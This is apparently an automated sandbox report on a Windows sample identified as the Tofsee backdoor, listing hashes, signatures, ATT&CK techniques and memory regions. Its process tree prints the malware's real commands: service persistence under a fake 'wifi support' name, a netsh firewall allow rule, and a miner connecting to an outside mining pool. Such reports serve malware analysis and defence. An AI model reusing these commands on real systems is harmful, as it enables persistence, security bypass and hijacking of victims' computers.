Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-11-2020 22:58

General

  • Target

    a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe

  • Size

    11.9MB

  • MD5

    8b67b5494864cc71ece704b8bb3fb2e8

  • SHA1

    3141e6c8be3b3b2891fb6cc5acd87b8dbddd0e7f

  • SHA256

    a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150

  • SHA512

    4f7bfc5d1d6fa5f2403a9958e169c45d1c140bc955b3568e0df9bc6a436afbd49184ee6f64c98cd3107712fcd406ce6ddf84b3112c3203dbf3c883a72071f484

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe
    "C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gakdqxct\
      2⤵
      PID:1896
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\otggjiyd.exe" C:\Windows\SysWOW64\gakdqxct\
      2⤵
      PID:1456
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create gakdqxct binPath= "C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe /d\"C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:1676
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description gakdqxct "wifi internet conection"
      2⤵
      PID:652
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start gakdqxct
      2⤵
      PID:888
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      • Modifies service
      PID:776
  • C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe
    C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe /d"C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Modifies service
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:380
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1944

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence
    • New Service (1) T1050
    • Modify Existing Service (2) T1031
    • Registry Run Keys / Startup Folder (1) T1060
  • Privilege Escalation
    • New Service (1) T1050
  • Defense Evasion
    • Disabling Security Tools (1) T1089
    • Modify Registry (3) T1112


Downloads

  • C:\Users\Admin\AppData\Local\Temp\otggjiyd.exe
    MD5
    5e469d7b08e4949c0e9218c2d7f1b00a
    SHA1
    84cc6a76d7e5521645bf81d70d93047bff7b6e45
    SHA256
    d0ee1c69724a68a9da7e606df07d931db50784c5f000b9bd45d107a5f1cb2c22
    SHA512
    57f19f1efcbd9ab3186cc54c3f3085aded3a20cfebebb781cb9abdefffe6e3436bb718be1d8be708811540936ac217325d1320eb562436409d31322b9c5a241a

  • C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe
    MD5
    5e469d7b08e4949c0e9218c2d7f1b00a
    SHA1
    84cc6a76d7e5521645bf81d70d93047bff7b6e45
    SHA256
    d0ee1c69724a68a9da7e606df07d931db50784c5f000b9bd45d107a5f1cb2c22
    SHA512
    57f19f1efcbd9ab3186cc54c3f3085aded3a20cfebebb781cb9abdefffe6e3436bb718be1d8be708811540936ac217325d1320eb562436409d31322b9c5a241a

  • memory/380-13-0x00000000001F0000-0x0000000000200000-memory.dmp
    Filesize
    64KB

  • memory/380-15-0x0000000005740000-0x0000000005B4B000-memory.dmp
    Filesize
    4.0MB

  • memory/380-16-0x0000000000240000-0x0000000000247000-memory.dmp
    Filesize
    28KB

  • memory/380-14-0x0000000000200000-0x0000000000205000-memory.dmp
    Filesize
    20KB

  • memory/380-12-0x00000000001D0000-0x00000000001D6000-memory.dmp
    Filesize
    24KB

  • memory/380-11-0x0000000001CE0000-0x0000000001EEF000-memory.dmp
    Filesize
    2.1MB

  • memory/380-8-0x00000000000C0000-0x00000000000D5000-memory.dmp
    Filesize
    84KB

  • memory/380-9-0x00000000000C9A6B-mapping.dmp
  • memory/652-4-0x0000000000000000-mapping.dmp
  • memory/776-6-0x0000000000000000-mapping.dmp
  • memory/888-5-0x0000000000000000-mapping.dmp
  • memory/1456-1-0x0000000000000000-mapping.dmp
  • memory/1676-3-0x0000000000000000-mapping.dmp
  • memory/1896-0-0x0000000000000000-mapping.dmp

  • memory/1944-17-0x0000000000250000-0x0000000000341000-memory.dmp
    Filesize
    964KB

  • memory/1944-18-0x0000000000250000-0x0000000000341000-memory.dmp
    Filesize
    964KB

  • memory/1944-20-0x00000000002E259C-mapping.dmp